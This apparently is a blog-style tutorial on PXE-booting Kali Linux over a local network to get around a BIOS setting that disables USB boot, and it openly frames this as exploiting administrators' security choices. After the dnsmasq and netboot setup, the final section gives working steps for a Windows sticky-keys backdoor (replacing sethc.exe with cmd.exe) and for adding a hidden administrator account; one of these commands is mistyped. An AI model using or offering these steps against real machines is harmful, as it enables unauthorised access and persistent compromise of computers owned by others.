Booting Kali Linux over the network when booting via USB is disabled

This guide will cover how to boot Kali Linux over the network. This is useful when booting from USB devices is not possible due a bios security setting but booting over the network is enabled.

Administrators sometimes disable USB devices to increase security, but they keep booting over the network enabled for maintenance purposes. This are we going to exploit.

Hardware Requirement: at least 4 GB of RAM is mandotary. The image is loaded over the network and then loaded into the memory, hence this requirement.

Note that this guide is heavily based on https://docs.kali.org/installation/kali-linux-network-pxe-install and https://www.offensive-security.com/kali-linux/booting-kali-linux-live-http/ , but I found that there were some missing steps in it at the end. Hence the effort for this guide. Any kali doc writers, feel free to take over these steps.

Setup

Connect your linux machine to the computer you want to boot Kali on. Assign the IP 192.168.101.1 to your Linux machine.

First, we need to install dnsmasq to provide the DHCP/TFTP server and then edit the dnsmasq.conf file.

apt-get install dnsmasq
nano /etc/dnsmasq.conf

In dnsmasq.conf, enable DHCP, TFTP and PXE booting and set the dhcp-range to match your environment. If needed you can also define your gateway and DNS servers with the dhcp-option directive as shown below:

interface=eth0
dhcp-range=192.168.101.100,192.168.101.110,24h
dhcp-boot=pxelinux.0
enable-tftp
tftp-root=/tftpboot/
dhcp-option=3,192.168.101.1
dhcp-option=6,8.8.8.8,8.8.4.4

If you are using different settings, make sure that the “dhcp-option=3,” is the same IP of your Linux machine. Your computer acts as an DHCP server.

With the edits in place, the dnsmasq service needs to be restarted in order for the changes to take effect.

service dnsmasq restart

Now, we need to create a directory to hold the Kali Netboot image and download the image we wish to serve from the Kali repos.

mkdir -p /tftpboot
cd /tftpboot
# for 64 bit systems:
wget http://repo.kali.org/kali/dists/kali-rolling/main/installer-amd64/current/images/netboot/netboot.tar.gz
# for 32 bit systems:
wget http://repo.kali.org/kali/dists/kali-rolling/main/installer-i386/current/images/netboot/netboot.tar.gz
tar zxpf netboot.tar.gz
rm netboot.tar.gz

Also make sure to download the ISO from (if you haven’t done this yet): https://www.kali.org/downloads/

Make sure that if you used a 32bit version in the previous step, you take a 32 bit version here again. Same goes for the 64 bit version. You can take the normal ISO.

We’ll have the initial kernel boot via PXE and we will obtain the kernel, initrd, and squashfs filesystem we need for this from a full Kali Linux release ISO from within the “live” directory. We copy the initrd and kernel into the TFTP root folder, while the squashfs file goes into the web root:

mkdir /mnt/iso
mount -o loop kali-linux-2017.3-amd64.iso /mnt/iso/
cp /mnt/iso/live/{initrd.img,vmlinuz} /tftpboot/
cp /mnt/iso/live/filesystem.squashfs /var/www/html/
service apache2 stop && service apache2 start

Now go to the boot options of the computer and select the Onboard NIC (Network Interface Controller):

You will now boot over the network and will be presented with this screen:

Select the Help option.

Now you are able to enter the following command:

vmlinuz initrd=initrd.img append boot=live components fetch=http://your.ip.comes.here/filesystem.squashfs

Press enter. You will see something like this:

Now you are booted into kali.
If not, make sure your apache server is setup correctly and your used IP’s are correct.

Further steps

You can copy c:\windows\system32\cmd.exe to c:\windows\system32\sethc.exe (overwrite). This will spawn an admin command prompt on the windows computer.
You will able to create a new admin account on the computer like this:

net user /add [username] [password]
new localgroup administrators [username] /add